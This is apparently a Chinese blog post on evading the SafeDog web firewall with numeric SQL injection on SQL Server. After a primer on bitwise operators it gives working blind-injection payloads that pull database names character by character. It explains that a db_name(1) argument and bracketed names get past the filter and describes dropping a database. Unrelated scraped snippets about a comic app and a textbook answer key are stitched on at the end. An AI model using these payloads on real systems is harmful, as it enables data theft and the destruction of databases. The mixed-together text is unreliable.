[email protected] 師傅一直在發bypass安全狗的例子,心裡怪癢癢的,發一枚
關於&符號和|:
(1)按位與運算子(&)
按位與運算將兩個運算分量的對應位按位遵照以下規則進行計算:
0 & 0 = 0, 0 & 1 = 0, 1 & 0 = 0, 1 & 1 = 1。
即同為 1 的位,結果為 1,否則結果為 0。
例如,設3的內部表示為
5的內部表示為
則3&5的結果為
按位與運算有兩種典型用法,一是取乙個位串資訊的某幾位,如以下**擷取x的最低7位:x & 0177。二是讓某變數保留某幾位,其餘位置0,如以下**讓x只保留最低6位:x = x & 077。以上用法都先要設計好乙個常數,該常數只有需要的位是1,不需要的位是0。用它與指定的位串資訊按位與。
(2)按位或運算子(|)
按位或運算將兩個運算分量的對應位按位遵照以下規則進行計算:
0 | 0 = 0, 0 | 1 = 1, 1 | 0 = 1, 1 | 1 = 1
即只要有1個是1的位,結果為1,否則為0。
例如,023 | 035 結果為037。
按位或運算的典型用法是將乙個位串資訊的某幾位置成1。如將要獲得最右4為1,其他位與變數j的其他位相同,可用邏輯或運算017|j。若要把這結果賦給變數j,可寫成:
j = 017|j
(3)按位異或運算子(^)
按位異或運算將兩個運算分量的對應位按位遵照以下規則進行計算:
0 ^ 0 = 0, 0 ^ 1 = 1, 1 ^ 0 = 1, 1 ^ 1 = 0
即相應位的值相同的,結果為 0,不相同的結果為 1。
例如,013^035結果為026。
異或運算的意思是求兩個運算分量相應位值是否相異,相異的為1,相同的為0。按位異或運算的典型用法是求乙個位串資訊的某幾位資訊的反。如欲求整型變數j的最右4位資訊的反,用邏輯異或運算017^j,就能求得j最右4位的資訊的反,即原來為1的位,結果是0,原來為0的位,結果是1。
當 select 0 | 100時,結果是:100(也就是右邊的數字)
當 select 0 & 100時,結果是:0(始終是0)
當 select 0 ^ 100時,結果是:100(也就是右邊的數字)
所以這個sql注入的型別只能是數字型
好了,背景交代完了,我們看看我在後端的sql語句:
select * from myuser.dbo.appuser where usertype=1
拼接的地方自然是usertype
最後的payload是:
:| (select(ascii((substring((select db_name(1)) ,1,1)))))-108
:^ (select(ascii((substring((select db_name(1)) ,1,1)))))-108
拼接到資料庫的語句是:
select * from ssoserver.dbo.appuser where usertype=1 | (select(ascii((substring((select db_name(1)) ,1,1)))))-108
select * from ssoserver.dbo.appuser where usertype=1 ^ (select(ascii((substring((select db_name(1)) ,1,1)))))-108
因為安全狗會攔截db_name(),所以就在這個函式裡面加入引數來繞過
就比如:db_name(1)
我們要如何查出資料呢?
就是:(select(ascii((substring((select db_name(1)) ,1,1)))))-108
的結果是ascii的減去108的差值,反映到where語句上的時候就對應id的資料,於是就可以查出資料了
然後還有一點要注意的一點是:
在資料庫中查出的db_name(0)是當前資料庫名,db_name(1)是master
然後對了,有人會問,得到資料庫名字有什麼危害啊?
自然是能刪除了
好,第二個安全狗第二個沒有過濾到的地方是:
中括號我如果知道有個資料庫叫:mytemp
我可以這樣刪掉它
注意,資料庫名可以用中括號包起來,這樣:[資料庫名]
先證明我這個是有安全狗,並且是最新的:
然後證明這樣可以查出資料:
成功刪除資料庫:
解決方案:
過濾 |
cimoc 最新版 Cimoc漫畫最新版
軟體介紹 cimoc漫畫最新版收集更多的漫畫型別,所有的漫畫非常的齊全,各大漫畫平台的有的漫畫在這裡都可以搜尋到哦 集齊的所有的漫畫資源,全面為使用者打造屬於自己的漫畫軟體,追漫的宅男宅女們千萬不要錯過了。cimoc漫畫最新版介紹 cimoc漫畫最新版功能 翻頁閱讀 page reader 捲紙閱讀...
cimoc 最新版 Cimoc最新版本
cimoc最新版本擁有超豐富的熱門漫畫資源,讓你在每乙個無聊的時間裡都可以自由閱讀好看的漫畫,每一本漫畫都擁有自己的標籤,讓使用者們可以通過這些標籤找到更多相似型別的漫畫,並且所有漫畫資源都可以讓你免費暢讀,看到好看的漫畫不要猶豫,直接點進去就能 cimoc最新版本 軟體特色 1.中漫 日漫 韓漫,...
運營管理最新版史蒂文森 運營管理答案 最新版本
最新可編輯 word 文件運營管理 11.04 第一章緒論 一 單選 填空 運營是企業 創造價值 活動的主要環節。企業之間的競爭最終體現在 運營過程的結果上 有形產品的變換過程通常也稱為 生產過程 p2 無形產品的變換過程有時稱為 服務過程 企業運營管理有兩大物件 運營過程 和 運營系統 p5 運營...